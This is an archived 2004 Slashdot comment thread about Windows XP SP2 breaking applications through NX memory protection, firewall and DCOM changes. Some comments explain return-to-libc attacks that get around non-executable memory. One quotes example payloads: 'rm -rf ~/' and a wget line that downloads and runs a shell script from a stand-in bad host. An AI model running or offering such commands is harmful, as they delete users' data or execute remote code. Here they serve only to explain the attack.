Catch up on stories from the past week (and beyond) at the Slashdot story archive

 



Forgot your password?
typodupeerror
×
Windows Operating Systems Software Upgrades

Windows XP SP2 Could Break Some Applications 513

Denver_80203 writes "An article from InfoWorld states that the upcoming Windows XP Service Pack 2 could break some 'unsecure applications.' In a quote from Tony Goodhew, a product manager in Microsoft's developer group says 'It doesn't really matter how long it is going to take you to do the work; security is an important issue and developers need to start doing that work now.' Or: 'The great bulk of applications will not be affected by memory protection. The number one that leaps to mind is execution environments with just-in-time code generation. The .Net Framework is one.' Fortunately for us, they are offering a course to guide the unsecure masses."
This discussion has been archived. No new comments can be posted.

Windows XP SP2 Could Break Some Applications

Comments Filter:
  • Uh oh (Score:3, Funny)

    by Bishop, Martin ( 695163 ) on Saturday March 06, 2004 @09:24AM (#8484476)
    "the upcoming Windows XP Service Pack 2 could break some 'unsecure applications.'"

    That's just about every application in Windows XP
    • Re:Uh oh (Score:4, Insightful)

      by Froug ( 710553 ) on Saturday March 06, 2004 @10:03AM (#8484662)
      You don't realize how true this is after the W2K source leak. Microsoft has to take drastic measures if they are to stem the flood of exploits.

      Making sure nothing can buffer overrun to execute with even user privileges is a neccessity now that countless local holes are known (Overflow on loading a bitmap? How in the hell did they manage to screw that up?).
      • Re:Uh oh (Score:5, Informative)

        by julesh ( 229690 ) on Saturday March 06, 2004 @10:12AM (#8484700)
        Are you kidding? You have seen the format of a bitmap, haven't you? It's a seriously screwed up format.

        I believe, BTW, the problem is an integer overflow one; a length field has a number substracted from it without previously checking that it is large enough to not wrap around to 2^32-(a little bit). This kind of thing happens a lot, and was the cause of the most recent Apache hole (among many others), so criticising MS for having one similar is a little harsh.

        • Re:Uh oh (Score:4, Insightful)

          by Froug ( 710553 ) on Saturday March 06, 2004 @11:12AM (#8485021)
          I've seen the format. I've seen worse, and bmp is hardly bad enough to mess up an implimentation for.

          I don't feel it's harsh at all to criticise over this. The Apache Group should also be embarassed for the same.
          (what, you assumed I'm yet another anti-MS/pro-OSS zealot?)

          Integer overflows are easily avoided, and the very fact that they crop up so often is the reason programmers keep such a sharp eye out for them (at least where I work, anyway).
          • Re:Uh oh (Score:3, Informative)

            by dnoyeb ( 547705 )
            Its why I favor java so strongly. Yet this seems to be one of the targets of the "patch." I hope this does not signal a return to the days where MS intentionally broke applications but never let on about it.

            This seems to be exactly why the government was suing them. They will support .NET making the adaption internally, but java is on its own. That is unfair use of monopoly power.
    • Re:Uh oh (Score:5, Interesting)

      by FuzzyBad-Mofo ( 184327 ) <fuzzybad AT gmail DOT com> on Saturday March 06, 2004 @10:06AM (#8484673)

      From the developer's guide [microsoft.com]. Emphasis mine.

      The security technologies included with Service Pack 2 will allow for better protection against network-based attacks.. Windows Firewall is now turned on by default and all ports are closed except when they are in use.

      I hope their firewall doesn't open ports automatically, or it's nothing more than swiss cheese.

      • Re:Uh oh (Score:4, Interesting)

        by DrSkwid ( 118965 ) on Saturday March 06, 2004 @10:34AM (#8484812) Journal

        hehe

        I also like :

        Work continues with microprocessor vendors to help Windows support hardware-enforced "no execute" (NX) on microprocessors that support the feature. This feature allows the CPU to enforce the separation of application code and data, preventing a component from executing program code that a worm or virus inserted into a portion of memory marked for data only.

        So now MS and 3rd party programmers will think to themselves "aw well, if my pointer arithmetic is poor the CPU will catch any over runs".

        Apparently MS hasn't learned the ancient ninja technique of heap redirection or return-to-lib.

        So new hardware security features will lead to *more* exploits!

        • Re:Uh oh (Score:5, Informative)

          by lowe0 ( 136140 ) on Saturday March 06, 2004 @11:18AM (#8485061) Homepage
          Nope. If the NX flag catches your problem, it won't let it slide - it'll refuse to run that segment of code. So instead of a buffer overflow you can't see, now you'll have an exception that's a lot more visible, and a lot less dangerous if it slips by QA.
          • Re:Uh oh (Score:4, Interesting)

            by dildog ( 128835 ) on Saturday March 06, 2004 @12:42PM (#8485541) Homepage
            I think you missed the point. This is fundamentally similar to 'stackguard' and has been circumvented for some time using the following technique: (and others, mind you)

            When you overwrite the stack pointer, you don't have to point to code that's on the stack.

            For example, I can overflow with a 'command-line string' on the stack, and have the overwritten stack pointer point to the address of a library function, such as 'system()', or something, and then it won't be executing any code from the stack, just taking arguments from the stack like usual.

            This can't be blocked with a conventional non-executable stack.
        • Re:Uh oh (Score:5, Insightful)

          by pavon ( 30274 ) on Saturday March 06, 2004 @12:51PM (#8485592)
          So now MS and 3rd party programmers will think to themselves "aw well, if my pointer arithmetic is poor the CPU will catch any over runs".

          Give me a break. You might as well say that we should get rid of memory protection and preemptive multitasking, because having them makes the programmers lazy, thinking the OS will catch their errors.

          The NX feature is very good for security and stability. All people including programmers make mistakes, and if you design your security policy on the basis that no one will ever make a mistake you are bound for trouble. The only sensible approach is to have multiple layers where mistakes in one will be caught in the next and prevented from becoming a bigger problem than it should.

          If the OS+hardware completely disallow you from writing to code memory, or executing application memory, then any attempts to do so will be killed on the spot and the blame will be placed squarely on your application. The user will know that your program screwed up (or was being malicious) instead of blaming it on windows. So not only will this close off an entire class of exploits, it will provide incentive for programmers to do a better job!
          • Re:Uh oh (Score:4, Informative)

            by Anonymous Coward on Saturday March 06, 2004 @02:29PM (#8486247)
            "The NX feature is very good for security and stability."

            NO NO NO! That's the kind of thinking that will result in a 'golden age' of exploitable software. NX does not close the vulnerability left by a buffer overflow. All it does is require you to use a different class of attack.

            Overwrite the stack pointer with the address of a suitable library function. E.g., clobbering the stack pointer with the address of system() and overwriting the top of the stack with (pointer(s) to) suitable arguments (e.g., "rm -rf ~/", or "wget -c http://somebadplace.com/somethingbad.sh;/bin/sh somethinbad.sh"). Nothing on the stack ever gets executed, and you neatly sidestep any protection afforded by NX.
      • Re:Uh oh (Score:4, Informative)

        by spideyct ( 250045 ) on Saturday March 06, 2004 @11:01AM (#8484968)
        If you keep reading, you see that they mean the application must support a stateful firewall.
        Ports will not accept incoming messages, unless an application has opened the port with an outgoing message (putting the port "in use").
        This means that server applications - which have to accept uninitiated communications - have to be put on a "whitelist" manually.

        It will not protect you against trojan horse applications which can initiate communications from your machine, but it will protect you against external port attacks which have helped some of the famous worms propogate.
      • by Sycraft-fu ( 314770 ) on Saturday March 06, 2004 @04:04PM (#8486921)
        This would be how any firewall worth it's shit works. Nothing is permitted incomming by default, unless there is a rule specifying otherwise. Now, when your computer goes and establishes a connection outgoing to another computer, that is permitted by default (unless there is a rule specifying otherwise).

        Question is, what happens when the data comes back? If your firewall just says "allow out, deny in" and simply evaluates each packet in a vaccuum, it would do no good. You could never establish communications since all inbound traffic would be dropped.

        So, what firewalls do is keep track of connections. You send a request to a webserver, it replies. The firewall, because it's stateful, knows that the reply is a response to your request, and permits it through. However, it's for that connection only. If the same server trys to poke at you, it'll get denied, while still allowing traffic for the web connection through.

        Thus a stateful firewall with two simple rules (allow out, deny in) can secure a desktop system pretty well. Anyone that pokes at the system will get nothing, but all requests that the user initiates will be allowed.

        The Windows XP firewall is a pretty simple one. By default, it does just this. You can also, if you like, specify inbound ports that are to be permitted at all times. So if you run an FTP server, you can specify that port 21 be permitted. However, in it's default config, it works great for most users. It's how I configure Kerio Personal Firewall for people, barring special needs.
    • Re:Uh oh (Score:5, Funny)

      by Nimloth ( 704789 ) on Saturday March 06, 2004 @10:18AM (#8484734)
      The upcoming Windows XP Service Pack 2 could break some 'unsecure applications'.

      Are we talking about Windows XP SP1?

  • Great! (Score:5, Funny)

    by Lumpy ( 12016 ) on Saturday March 06, 2004 @09:26AM (#8484480) Homepage
    another reason for the company I work for to NOT migrate from Windows 2000.

    Thank you Microsoft!
    • Re:Great! (Score:5, Insightful)

      by wasabii ( 693236 ) on Saturday March 06, 2004 @09:28AM (#8484494)
      Yeah. When the open source guys break insecure applicications at least they get fixed in minutes, or it just takes a recompile. :0

      How are you suppose to correct these apps? I bet some don't even have company's behind them anymore.
      • Re:Great! (Score:5, Insightful)

        by mcx101 ( 724235 ) on Saturday March 06, 2004 @09:41AM (#8484563)

        It's hardly new for Windows to drop backwards compatibility in areas. Many applications which are partly 16-bit and partly 32-bit won't run on Windows XP, but do run on Windows 95/98/ME for example

        Windows XP has application compatibility features which allow you to set the OS version to previous releases and provide compatibility with older registry layouts, for example. That kind of compatibility feature is unlikely to help with stricter security controls of course (unlesss there's an option simply to turn off the new security features).

      • Re:Great! (Score:4, Insightful)

        by malchus842 ( 741252 ) on Saturday March 06, 2004 @09:46AM (#8484584)
        I've run into this many times. Or if the company exists, they have dropped support for the older version. And many times, the newer versions are not providing anything useful *except* support for the new OS. Not worth the upgrade price.

        With open source, I can nearly always manage the problem - recompile works most of the time, and if not, I can either fix it myself, or find someone who has or will fix it, either for free or for a reasonable fee. More and more of my clients are starting to see the value of Linux and open source applications, especially in the server area. And these are small to medium sized businesses who tend to be very conservative about how they spend their computing money.

        I even have customers asking about switching to Mac - something that hasn't happened in ages, if ever!
    • Re:Great! (Score:5, Insightful)

      by sketerpot ( 454020 ) <sketerpot@gm[ ].com ['ail' in gap]> on Saturday March 06, 2004 @11:20AM (#8485067)
      Let me get this straight: Microsoft is making XP more secure in a way that could break some programs (sort of like the grsecurity linux kernel patches break some programs), and you're against that? Sure, it would be nice if it was optional---but it's Microsoft! Doing something about security! Even if it means actually announcing that some programs may be broken!
    • Re:Great! (Score:3, Funny)

      by ivan1011001 ( 751254 )
      There's no reason not to migrate from Windows 2000. Just don't migrate to Windows XP. You could always switch to Linux, BSD, or any operating system. Of course, now that Windows 2000 is open source, you really don't need to.

  • Java? (Score:5, Interesting)

    by 0tim0 ( 181143 ) on Saturday March 06, 2004 @09:27AM (#8484484)
    The great bulk of applications will not be affected by memory protection. The number one that leaps to mind is execution environments with just-in-time code generation.

    Is this supposed to mean that Java will stop working?

    --t

    • Re:Java? (Score:4, Funny)

      by LousyPhreak ( 550591 ) <lousyphreak&gmx,at> on Saturday March 06, 2004 @09:42AM (#8484567)
      no microsoft would never do this, they would be sued for doing so, you know anticompetitive business tactics and the like...

      but wait... there was something...
    • Re:Java? (Score:5, Informative)

      by DotNetGuru ( 704728 ) on Saturday March 06, 2004 @12:09PM (#8485346)
      If Java is doing the right thing it will not be broken.

      The right thing to do is to call VirtualProtect(addr, size, PAGE_EXECUTE_READWRITE, &prevProtect);

      That will mark the memory pages as being read/write/execute (where as previously they were only read/write). People should have been doing this before anyway (as the pages were never guaranteed to be executable), and if they didn't it's their bug.

      I'm betting that Sun can download the beta and test Java on XP SP2 to make sure they're compliant though. Hell, Microsoft could probably even do some compatibility testing for them and enable a compatibility layer for Java. But then again Sun might sue them for that. MS probably just wants to stay away :).
  • by acostin ( 229653 ) on Saturday March 06, 2004 @09:29AM (#8484496) Homepage
    Open Office, Mozilla, Java based applications, Apache with PHP, and other applications written by a bunch of programmers without a management control :)
  • some funny quotes (Score:3, Interesting)

    by stonebeat.org ( 562495 ) on Saturday March 06, 2004 @09:32AM (#8484513) Homepage
    From the article @ Windows XP SP2 could break existing application [computerworld.com]
    according to Tony Goodhew, a product manager in Microsoft's developer group:

    "SP2 will break some applications because they are insecure," he said. "Security is important, and it is not just a Microsoft problem but a developer community problem. We all need to work together to create a more secure computing environment."

    "It doesn't really matter how long it is going to take you to do the work; security is an important issue, and developers need to start doing that work now," Goodhew said.
    • by julesh ( 229690 ) on Saturday March 06, 2004 @10:17AM (#8484731)
      Which is what happens when you let a product manager talk about technical issues.

      There applications that will break are _not_ (necessarily) insecure. They just behave in a way that makes it impossible for Windows to tell isn't somebody trying to execute some code in an overflowed buffer.

      Typical MS press relations, blame everyone else.

  • by hattig ( 47930 ) on Saturday March 06, 2004 @09:32AM (#8484515) Journal
    Sounds like an issue with NX bit implementation on A64 ... this protects memory that is tagged as data from being executed (which protects against buffer overrun exploits, which are 50% of the MS security issues). This would affect .NET, Java, etc. However I'm sure that there is a way to fix this for these types of application!

    Regardless, enforcing decent security like this is good.

    Now all the hackers will have to try other methods of hacking windows, heh. I'm sure that there is no shortage of them!
    • Yes, as discussed in the previous article, these types of applications will need to use the VirtualProtect() API to tell Windows to make their pages executable.

      Unfortunately, this will mean patches will have to be released to just about everything that does this. Presumably, MS will include a patch for .NET along with SP2 (?), but if you need Java you'll probably have to wait for your JVM vendor to issue an upgrade...
    • by Helvick ( 657730 ) on Saturday March 06, 2004 @10:37AM (#8484829) Homepage Journal
      The NX support is only one of the major changes and it will only affect AMD64 and Itanic for now. The lack of NX in Prescott's "IA32e" extensions is listed here [iu.edu] by an intel source and discussed in detail in this thread on Ace's Hardware [aceshardware.com]. This unofficial comment [aceshardware.com] in that thread might lead a true conspiracy theorist to conclude that there might be widespread issues with turning on NX support right now. Reading MS's Developer overview for SP2 here [microsoft.com] also gives the impression that NX related problems will not be easy to workaround, at least for non open source apps\drivers. The fact that AMD haven't been making any effort to try to market the NX capabilities in AMD64 outside of the enthusiast market could be explained if there are major issues with SP2.

      The RPC and DCOM changes are much more likely to have wider impacts - especially for enterprise applications.

      The ICF changes are fairly light (unfortunately in my view) and not that hard for end users\admins to modify so even if there are issues workarounds will be fairly simple.

  • by ClippyHater ( 638515 ) on Saturday March 06, 2004 @09:32AM (#8484516) Journal
    Microsoft has a nice bit of info [microsoft.com] for developers. All in all, I'm pretty impressed with the work and thought they've put into this SP--should make the world just a little bit safer for computing (of course, only for the folk running XP, the rest of their offerings don't have any of this as far as I know).
  • More work.....sigh. (Score:5, Informative)

    by wongqc ( 555152 ) on Saturday March 06, 2004 @09:33AM (#8484523)
    Without doubt, countless QA software testers & coders will cry out in anguish over this.....more work for them to do. But if they want to sell their software on the large Windows desktop market....They have little choice in the matter.

    For each software build, we have to test against the various OS versions, and different service packs builds. Not fun...

    • Duh??? (Score:5, Funny)

      by Tim Ward ( 514198 ) on Saturday March 06, 2004 @09:42AM (#8484568) Homepage
      QA software testers & coders will cry out in anguish over this.....more work for them to do

      I don't think the will "cry out in anguish" if they've got any sense. In today's market they'll jump for joy, knowing that their jobs are safe for another few months.
  • by Kalroth ( 696782 ) on Saturday March 06, 2004 @09:34AM (#8484526)
    I really like the direction Microsoft is heading.
    Granted it was needed as their reputation, in regards of security, has always been low to none.

    I really hope this will rid Windows XP of future remote exploits, since that's still the biggest threat Windows is facing.
    Having said that, this wont fix all security problems, there will always be the luser that executes whatever is mailed to him/her, but it's still a step in the right direction.
  • by thestarz ( 719386 ) on Saturday March 06, 2004 @09:35AM (#8484534)
    Fortunately for us, they are offering a course to guide the unsecure masses.

    The blind leading the seeing?
  • by mpn14tech ( 716482 ) on Saturday March 06, 2004 @09:39AM (#8484550)
    I read an article about this yesterday and wanted to test it against some apps where I work, but could not find the download for it on the Microsoft website. Do you have to have an MSDN subscription to get it. Seems rather rather screwy that if I want to make sure my app works with Microsofts OS I pay to them an extra $500 for the privilege. Maybe this is the new money making model. Profits are down this quarter, lets go break some code and charge them for how to fix it.
  • by jkbuha ( 713400 ) on Saturday March 06, 2004 @09:40AM (#8484553)
    ...when one realises that most of this effort is fruit of a tiny 5kb worm which actually had asked mr gates to repair his software... I'm still working on my sig
  • I like it (Score:5, Insightful)

    by SlightOverdose ( 689181 ) on Saturday March 06, 2004 @09:41AM (#8484558)
    First, they decided to postpone Longhorn "Until it's done", rather than releasing a shoddy product early.

    Second, they've gone so far as to break application compatibility in order to clean up a number of deeply embedded security holes in Windows.

    Personally, I think this is a Very Good Thing(tm). Microsoft may finally be "Getting it"
    • Re:I like it (Score:5, Insightful)

      by AndroidCat ( 229562 ) on Saturday March 06, 2004 @10:02AM (#8484660) Homepage
      Hopefully they're cracking down on all the apps that have to run as admin. If all those users who open up strange attachments didn't have authority to play with the %windows% directories, there'd be a lot less 0wn3d boxes on the net.

      I bet that most of the things broken should have been fixed back in the NT5 guidelines pre-Win2000.

      • Re:I like it (Score:3, Interesting)

        Im hoping that once .NET takes off, Outlook will only open .NET executables. Since they run in a VM, they can be restricted.

        You could configure it so all untrusted code was restricted.

        (Try running a .NET exe directly over a windows share if you want to see it in action. If the program tries to access the local filesystem it gets an Exception).
      • Some stupid developers (including Canada Customs & Revenue Agency's contractor who did the "tables on disk") put their data files in the "Program Files" subtree, and don't set any acls to allow anyone other than admin access.

        One method I've used to get around this is logging in as a normal user, watching for what files it can't write, logging in as admin, setting the acls (with "cacls") to allow access to that file, log in as normal user again, run the program again, etc.

        Sure, it's slow, but some prog

      • Re:I like it (Score:3, Informative)

        by Chester K ( 145560 )
        Hopefully they're cracking down on all the apps that have to run as admin.

        It's been a requirement for Windows XP Logo Certification (maybe even Windows 2000 certification, but I'm not sure) that your application has to run under a normal user account.

        Of course, for apps that don't get logo certified, I don't think there's much Microsoft can do to force them to work. :( At least all over MSDN they recommend many times that when you use Visual Studio, you should do all your developing under a normal user
    • Re:I like it (Score:3, Interesting)

      by naelurec ( 552384 )
      The only thing they get is the bottom line.. the biggest issues with Windows is spyware & viruses (for the majority of people). These are HUGE issues for both home and business users.

      Here is what I see -->

      My KDE 3.2 desktop ease of use is right up there with other operating systems .. I have people using my system all the time -- everything from children to senior citizens (70+). The fact that I can install Linux MUCH EASIER than Windows (pop in Knoppix CD and initiate a HD install) and it doesn't
    • Re:I like it (Score:5, Insightful)

      by Spoing ( 152917 ) on Saturday March 06, 2004 @10:29AM (#8484788) Homepage
      1. Personally, I think this is a Very Good Thing(tm). Microsoft may finally be "Getting it"

      While I agree, I'm becomming a strong advocate for looking at the world from the point of base motivations.

      Microsoft is primarily motivated to keep stock prices going up -- or at a minimum -- stable.

      If these changes become too painful for those who don't care about security, it will cause a decrease in the deployment of Windows XP and XP-specific programs.

      If this happens -- or may happen -- Microsoft will do something to make people happy...even if that means back stepping.

      That said, I can see them putting out XP SP2 (forcing the app vendors including MS themselves to deal with security) and then offering a variety of moderately painful workarounds. Ideally, the workarounds would break with each minor update, forcing the security issue.

      Putting the changes in XP only, though, does fit with Microsoft's motivation to get people to upgrade. Now they can say "well, W2K is not nearly as secure as XP", even though they could back port the changes to W2K -- though there is no motivation to do so.

      From motivations, though, it's hard to beat OSS on security. The code is there, and if something is not secure it will be made secure because the developers are personally driven to make it so.

      (ObDisclaimer: Keeping in mind that security is always a process not a product. Tools can be handy or even critical, though how they are used and why is much more important.)

  • Sounds like... (Score:5, Interesting)

    by Khan ( 19367 ) on Saturday March 06, 2004 @09:43AM (#8484569)
    ...IE will continue to be broken then :-)

    Actually, I'm very interested to see if the SP2 pop-up ad blocker will actually work in IE since MS has dragged their feet on this issue. Half the battles we have been fighting lately at work involve IE and pop-ups that install crap without any notification.
  • by Eponymous Cowboy ( 706996 ) on Saturday March 06, 2004 @09:44AM (#8484576)

    Actually, only the Itanium and AMD K8 [microsoft.com] are affected by this immediately; Microsoft isn't yet marking memory nonexcutable by default on the good old x86 processors that we all use.

    Regardless, it is trivial for developers to update their code for things like JIT compilers, with a simple function like this:

    void MakeMemoryExecutable ( void* buffer, int lengthInBytes )
    {
    DWORD op;
    VirtualProtect(buffer, lengthInBytes, PAGE_EXECUTE_READWRITE, &op);
    }

    I added that piece of code to my company's JIT compiler some years ago, just to ensure that the proper flags were set. I figured Microsoft would eventually switch to nonexecutable data and stack segments, much like the OpenWall [openwall.com] project has done with their Linux patches. Glad to see Microsoft is finally taking the first steps.

  • by zenpiglet ( 708412 ) <zenpiglet AT hotmail DOT com> on Saturday March 06, 2004 @09:45AM (#8484578)
    SP2 is not just another Service Pack. MS are using this as a means to introduce a lot of new stuff. everything from locked-down DCOM settings, to pop-up blockers and a new version of the Windows Installer.

    A lot of stuff is going to break, but I think that this is good in a way. MS have finally put security ahead of backward compatibility. Once these changes are in place and apps are working with them, the system is going to be more secure. For once MS should be applauded - yes, you can argue it's a bit late, but at least they're doing it now.

    If you want to check out what changes SP2 actually makes, have a read of this white paper:

    Changes to Functionality in Service Pack 2 for Microsoft Windows XP [microsoft.com]

    Lengthy, but worth a read, especially if you have apps that you think might be affected.

    A downloadable version is available here [microsoft.com].

  • Good (Score:5, Insightful)

    by quantum bit ( 225091 ) on Saturday March 06, 2004 @09:49AM (#8484598) Journal
    Microsoft has pandered to broken applications for far too long. Maybe if they finally get over their "backwards compatibility at all costs" attitude, they'll get around to fixing some of the fundamental flaws in their OS.

    I highly doubt that Linux authors would think twice about breaking buggy apps to force the issue.
  • by Neillparatzo ( 530968 ) on Saturday March 06, 2004 @09:54AM (#8484617)
    Windows apps suffer from buffer overflows, Slashdot bags on Microsoft for having buffer overflows.

    Windows adds NX security to prevent buffer overflows, Slashdot bags on Microsoft for breaking a few apps in the process (apps which were arguably broken in the first place, just the spec was never enforced).

    I understand there's a slight bias on this site, but Jesus Christ you guys.

    • by Liselle ( 684663 ) * <slashdotNO@SPAMliselle.net> on Saturday March 06, 2004 @10:24AM (#8484766) Journal
      The fact that you got modded up to +5 Insightful in a heartbeat should be answer enough for you. There are plenty of lurkers here that don't have the "damned if you do, damned if you don't" hatred for Microsoft. This site is more than just the opinions of those brave enough to post, or the crackbrained comments the editors add to the write-ups.
      • The fact that you got modded up to +5 Insightful in a heartbeat should be answer enough for you.

        Silent moderation, not really enough. Hardly anyone bothers to stand up to the rampant editorial bias around here, from the article selection to the snippy commentary inserted after most of them.

        Homogenized corporate media occasionally enjoys a story about the ills of homogenized corporate media. Then they go right back to conforming to the ratings machines. I come to slashdot for the community now, the ar
  • by keath_milligan ( 521186 ) on Saturday March 06, 2004 @09:55AM (#8484626) Homepage
    Backward compatibility has been a bit of a sacred cow in Windows for too long. Much of Windows' excess complexity and security deficiencies can be directly attributed to compromises made for the sake of compatibility with old applications.
  • I thought... (Score:3, Insightful)

    by Gyorg_Lavode ( 520114 ) on Saturday March 06, 2004 @09:56AM (#8484631)
    that the memory protection was only usable w/ processors that flagged memory.
  • by Jugalator ( 259273 ) on Saturday March 06, 2004 @09:57AM (#8484637) Journal
    Here's a list of a few applications that has been reported having problems in the latest betas of SP2, compiled from comments at Neowin when they posted these news:

    - Zone Alarm 2 (uninstall stops working)
    - BS Player (driver fail to load)
    - Roxio Easy Media Creator 7
    - Microsoft Intellipoint 5.0
    - Azureus BitTorrent client
    - ATI's Rage3DTweak for Radeon
    - Easy CD Creator 5
    - eMule
    - Tritton NAS-120's Managment Interface
    - Leadtek WINFAST TV PVR (driver fail to load)
    - ISO Recorder Powertoy

    Also, a user reports the Windows XP SP2 firewall blocking incoming FTP traffic even without an installed firewall, and XP's built-in disabled.

    Maybe it's "beta diseases", but it does seem like a lot to break for a service pack, even in a beta. These are usually quite stable as they contain mostly bugfixes, not Win32 API changes (which these problems are supposedely caused by).
  • by braddock ( 78796 ) on Saturday March 06, 2004 @09:58AM (#8484641)
    This is a good thing that OSes like Solaris have had available for years. OpenBSD has recently changed their default memory page allocation permissions on architectures where it's possible for a similar effect. Patches exist under Linux to do it. However, I believe in all these cases that you can still REQUEST memory allocations that do NOT have the restriction if you are doing JIT compilation or whatnot.

    Microsoft isn't stupid. I'm sure they'll figure out a way to allow old apps to run with the old allocation behavior. Their entire business relies on legacy compatability. At worst you'll need to set some flag on the application launch.

    The other thing to note is that crackers have also had ways to defeat execution-protected memory for years as well. It makes a buffer overflow exploit a bit more difficult, but where there is a will there is a way.

    For example, even if the protection prevents you from writing executable code directly into memory, you can still typically do things like overwrite the stack and hijack the program's execution to a system call with malicious parameters (in Unix, the classic call to hit is system()...no custom code execution required, just a 'rm -rf /' string somewhere in memory).

    Braddock Gaskill
  • Sun Hot Spot (Score:5, Interesting)

    by codepunk ( 167897 ) on Saturday March 06, 2004 @09:59AM (#8484642)
    Sounds like a rather nice way of introducing stability and or compatibility problems to java by not allowing Sun's Hot Spot just in time compiler to work correctly.
    • Re:Sun Hot Spot (Score:3, Interesting)

      by Chester K ( 145560 )
      Sounds like a rather nice way of introducing stability and or compatibility problems to java by not allowing Sun's Hot Spot just in time compiler to work correctly.

      Had Sun followed the instructions for making executable code pages for their JIT like MSDN has explained how to do since Windows 95, then the Hotspot compiler would work just fine.

      If you want to blame someone here, blame Sun for not coding their stuff correctly in the first place.
  • by Stevyn ( 691306 ) on Saturday March 06, 2004 @10:09AM (#8484690)
    Think of apple, they were never to worried about backwards compatibility and their os is more stable because of it. All those programs that weren't compatible with osx had to be updated to ensure they'd work with the changed operating system. True, the change was big because they went to a unix varient, but they still had the balls to tell developers to adjust or lose customers.

    Now microsoft has always tried to make it easy to run old programs. Think of how long dos lasted so businesses could use their old proprietary programs. This caused a lot of problems with windows crashing. Windows xp was supposed to fix that shit, but now a new slew of shit has come about. Now what they're saying with sp2 is that they recognize their customers want security and stability over backwards compatibility.

    The reason they're finally starting to do this is probably to compete with linux since those people most likely had to leave their old familiar apps with new ones. They see that people would rather deal with the adjustment of a new look and feel over constant reboots.

    Now while everyone can point fingers and laugh at .NET, this is very smart for them. It makes it easier and cheaper for developers to make consistant apps in current and future versions of windows. If developers rely on ms code to handle the grunt work and they just do the stuff that makes their program, then they have a lot less overhead. And with microsoft grabbing it's balls and betting on security and stability, they can handle the backend bugs with their updates. True, that requires them to actually patch, but if they start with a much more stable and efficient groundwork, you'll see a lot less patches then now.

    Remember guys, microsoft isn't stupid.
  • by Schemat1c ( 464768 ) on Saturday March 06, 2004 @10:10AM (#8484694) Homepage
    As superstitious as this sounds I have found this to be true over the years with Microsoft. Almost without fail the even numbered SP's have broken features and the odd numbered ones fix them. I'll wait for SP3.

    Besides, the combination of my Netgear firewall, McAfee Virusscan and just not opening strange attachments in my email protects me just fine.
  • by H8X55 ( 650339 ) <jason DOT r DOT thomas AT gmail DOT com> on Saturday March 06, 2004 @10:11AM (#8484698) Homepage Journal
    In a quote from Tony Goodhew, a product manager in Microsoft's developer group says 'It doesn't really matter how long it is going to take you to do the work; security is an important issue and developers need to start doing that work now.

    Not to flame, cause i'm not like that, but c'mon!?!

    Pot to Kettle, "Guess who's black?"
  • by at2000 ( 715252 ) * on Saturday March 06, 2004 @10:16AM (#8484729)
    We have been waiting this for over 5 years!
    The plain text mode feature of Outlook Express provides users with the option to render incoming mail messages in plain text instead of HTML. When Outlook Express is running in plain text mode, the rich edit control is used instead of the MSHTML control. You avoid some security issues that result from the use of MSHTML by using the rich edit control."
    • by Anonymous Coward on Saturday March 06, 2004 @12:19PM (#8485408)
      1. Dropdown the Tools menu and select Options.
      2. Select the Read tab.
      3. Check the "Read all messages in plain text" check box.


      Or you could just sit and blame Microsoft for your inability to read their supplied documentation pandering to a community that is as inept and continue to use the product without a clue as to how it works.
  • These changes... (Score:3, Insightful)

    by Trillan ( 597339 ) on Saturday March 06, 2004 @10:30AM (#8484790) Homepage Journal

    I'm no Microsoft fan, in fact quite the opposite.

    But by and large, these look like common sense changes that will likely cause a great deal less trouble than the move from 2000 to XP did for application vendors.

  • by OmniGeek ( 72743 ) on Saturday March 06, 2004 @10:30AM (#8484792)
    These folks write and consult and teach about Windows drivers. I've followed their newsletter ever since I had to write an NT kernel driver for some custom I/O hardware, in case I ever needed to do another one (blechh!).

    According to their newsletter at www.osronline.com, XP SP2 will include mandatory runtime memory pool overrun checking for all drivers. While this will improve the OS' security, it will ALSO cause mysterious failures on upgraded systems due to poorly-written legacy XP drivers. I make no judgements as to the wisdom of this course, but it's definitely worth knowing about beforehand. Of course, if they'd done this FROM THE START, then there would be no failures from it with the upgrade...
  • Apple Panther 10.3 (Score:4, Informative)

    by LoudMusic ( 199347 ) on Saturday March 06, 2004 @11:10AM (#8485014)
    In similar news, I've begun upgrading computers at work to OS X 10.3 and found things like AppleScripts I have made suddenly don't work anymore. WTF!? And various other installers (presumably using AppleScript) don't function either.

    I'm all about progress and out with the old but ditching last year's technology is a bit quick.
  • by polyp2000 ( 444682 ) on Saturday March 06, 2004 @11:28AM (#8485101) Homepage Journal
    seems like a great way to give people a longhorn
  • by the_skywise ( 189793 ) on Saturday March 06, 2004 @11:36AM (#8485133)
    My Norton Internet Security currently interferes with my Visual Studio .NET remote debugging. So I can disable it while debugging or I can configure NIS to track when the program is running and let it use those ports.

    Now MS says, with their new firewall, I don't *have* that option? Now anybody who wants to write an app to use a port must first notify MS that it wants to use that port.

    Doesn't this mean that malicious programs will just quietly open up firewall ports on their own without notifying the user?

    Secondly, what does this mean:

    "Another product that Microsoft needs to update is the .Net Framework. The new memory protection features in SP2 require developers of certain applications to mark their code with memory execution permissions. If they don't, the protection features could interfere with the application, according to Microsoft.

    "The great bulk of applications will not be affected by memory protection. The number one that leaps to mind is execution environments with just-in-time code generation. The .Net Framework is one," Goodhew said. "

    Translation:
    Mostly only unmanaged C++ programmers will be affected by these security changes. If you had just programmed the Microsoft way to begin with and used .NET like we told you, you won't be affected. (But .NET apps are going to have to be modified to switch on memory protection)

    Memory protection only occurs on NEW processors. The vast majority of the world runs Windows on NON-SECURE processors.

    Stranger still, Microsoft has had buffer overrun checking BUILT IN to Visual Studio .NET. (Which, last I checked, was the only way to make .NET objects that run on Windows). Without that flag turned on, the .NET object is marked UNSECURE.

    Lastly, Microsoft's greatest security problems are not buffer overruns or firewall holes. They're AUTOMATIC ACTIVEX control installation from malicious pop ups to install spyware. They're wide open access to the email address box and a by-default scripting system that allows malicious emails to respawn themselves. They're bugs in the Internet Explorer control that allow malicious URL's.

    NONE of these "security innovations" even take a crack at stopping those!

    What DO these security innovations do?

    Destroy a previously lucrative software market for antivirus tools.

    Take the firewall OUT OF THE CONTROL of the user and put it firmly inside the OS to determine what's good for you. (Remember DRM? Isn't it interesting that the main thing broken from this portion of the update are peer-to-peer apps and FTP sharing?)

    Further entrench .NET into the programming paradigm and making Microsoft Programming Languages THE programming languages. (Programmer mindshare... if you're busy keeping up with Microsoft, you're not programming for something else or making reusable code to port to other platforms.)

    I'm all for security, and now these boxes will be secure... But no moreso than the typical user installation out there today that uses a third party antivirus/firewall solution and keeps their system up to date with the latest patches.

    This is about as effective at what MS did with Outlook XP and *by default* turning off the ability to get attachments out of your email. You had to setup a profile configuration OR edit your registry settings to get that feature back.

